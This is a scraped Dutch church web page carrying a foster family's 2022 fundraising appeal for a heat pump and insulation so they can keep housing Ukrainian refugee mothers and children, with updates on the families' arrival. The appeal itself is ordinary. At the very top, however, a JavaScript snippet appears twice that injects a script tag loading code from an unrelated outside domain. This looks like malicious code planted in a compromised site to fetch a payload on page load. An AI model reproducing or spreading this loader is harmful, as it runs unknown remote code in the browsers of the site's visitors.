;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); www.geef.nl/nl/actie/familie-colijn-gaat-opvang-uitbreiden/donateurs - PKN Damwâld

www.geef.nl/nl/actie/familie-colijn-gaat-opvang-uitbreiden/donateurs

Gepubliceerd op: zaterdag 9 april 2022

Beste gemeente,

Wij, Robert & Sannie, wonen sinds iets meer dan een jaar op een boerderij in Menaldum. Op dit moment zitten wij in de opstartfase van het opzetten van een gezinshuis om jongeren op te vangen die tijdelijk of langdurig opvang nodig hebben. Maar voordat we zover zijn, breidt ons vrijwilligerswerk aan huis zich snel uit. Naast het draaien van ons pleeggezin met 6 kinderen zoeken we altijd naar nieuwe manieren om uit te delen aan andere gezinnen. Wij willen vanuit ons gezin graag initiatieven faciliteren om anderen te ontmoeten, sociale netwerken te versterken en een plek te zijn waar mensen zich thuis voelen.

Op dit moment houdt dat in dat we vrijwillig activiteiten aanbieden die gericht zijn:

* op het ontmoeten van grote (pleeg) gezinnen in de regio, * weekend logeeradres zijn voor een tienermoeder (uit Sierra Leone) met baby 

* en we zamelen kleding en speelgoed in om gratis weg te geven aan gezinnen.

Dit breidt nu uit met:

* tijdelijke en/of langdurige opvang aan moeders en kinderen die hier vluchteling zijn uit Oekraïne. 

* een ingerichte plek om spullen op te slaan voor gezinnen

* nieuwe activiteiten door en voor vluchtelingen gericht op versterking van het sociale netwerk en integreren

Meerdere mensen hebben ons gevraagd of ze ons kunnen helpen met het ondersteunen van ons als gezin en dat is geweldig! Wij zouden namelijk graag ons pand willen verwarmen wat nu niet mogelijk is. Om je een korte indruk te geven is onze gasrekening nu 750 euro per maand (verwarmen van 2 kamers en 2 keer douchen per week voor 10-12 personen). Maar we zijn blij dat jullie ons er ook graag warmpjes bij zien zitten, onze plannen een warm hart toedragen en willen helpen om samen nog meer warmte uit te kunnen gaan delen aan anderen, voor nu en in andere seizoenen.

Via deze manier vragen we jullie om die warmte te doneren door het sponsoren bij de aanschaf van:

→ een warmtepomp en het isoleren van de boerderij.

https://www.geef.nl/nl/actie/familie-colijn-gaat-opvang-uitbreiden/donateurs

Uw hulp aan ons, zou een enorme ondersteuning zijn om onze draagkracht en beschikbaarheid te vergroten en geeft ons een flinke stoot motivatie om meerdere plannen uit te gaan voeren. Een duurzame investering die vele jaren mee kan.

 Update: 20 maart 

Elena en haar 3 kinderen (11, 7 en 1) zijn vorige week bij ons gekomen. Ze zijn veilig! En hadden echt maar een rugtas mee. Na een paar intense dagen met kennismaken, wennen, handen en voeten werk en leuke ontspannen activiteiten in en om de boerderij zijn ze een beetje gesetteld. Ook al zijn er mooie zonnige dagen geweest, in huis is het nog koud. Elena vertelde ons ook dat haar baby snel ziek is dus we moeten nog uitzoeken wat er met hem is. Er liepen onderzoeken in de Oekraïne. Iedereen heeft sloffen en een onesie gekregen voor de warmte en er staat een elektrische kachel extra aan in hun appartementje. We zijn onder de indruk van hun bescheidenheid en armoede en proberen hen gerust te stellen dat ze hier zo lang kunnen blijven als nodig is. Ze eten mee, helpen mee en anderen helpen ons. Kapotte apparaten zijn gemaakt, er zijn boodschappen gebracht, wat kleding is geregeld, een bed extra en voor de verjaardag van 1 van de kinderen wordt er een cadeau, taart en schoolspullen gedoneerd. Wauw! Volgend weekend komt onze andere loge met baby (een vluchteling uit Sierra Leone) voor het eerst een weekend logeren en zullen we ook beleven hoe dat is. We zijn een huis vol, een huis met 9 of soms 10 kinderen, een huis waar je veilig bent, kan spelen en gezien wordt. Ook of juist de mama’s 🙂

 Een 2e gezin komt! (Bij het lezen: 2e gezin is veilig aangekomen!)

Inmiddels zijn we 10 dagen verder. Tien dagen met lachen, tranen, werken en wennen. Nog steeds zijn er veel mensen die helpen en meedenken en daardoor voelt alles wat we doen voldaan en is het goed te dragen. Het gezin voegt ontzettend goed en we hebben al een weg gevonden om bij elkaar in de buurt te leven. Dit weekend was de mama met haar kindje ook bij ons en ook zij voegde zich in het leven hier. Ze is erg zelfstandig maar genoot van de nabijheid van familie.

Aankomende week komt er een 2e gezin uit Oekraïne en richten we nu weer een ruimte praktisch en gezellig in om dit mogelijk te maken. Ook dit gezin neemt een baby mee maar ook een dochter met het down syndroom. In onze samenleving is er veel aandacht voor deze kinderen en is de zorg goed geregeld maar daar is dat niet het geval en kan je meestal niet eens naar school. We zullen snel merken welke uitdaging dit met zich meebrengt maar we zijn vastbesloten om ons ook voor dit gezin in te zetten.

Ook moet er een douche verbouwing komen (dat de gezinnen privacy hebben) en willen we ons gaan voorbereiden op nieuwe moeders met kinderen die hier verblijven. 

 Willen jullie voor ons in je eigen netwerk vragen of er mensen zijn die betrokken willen zijn bij het mogelijk maken van de opvang voor ons. Die ons financieel kunnen ondersteunen vanuit hun bedrijf, diaconie of netwerk? Kan je jouw omgeving ook enthousiast maken om ons doel te bereiken?

 Groetjes Robert & Sannie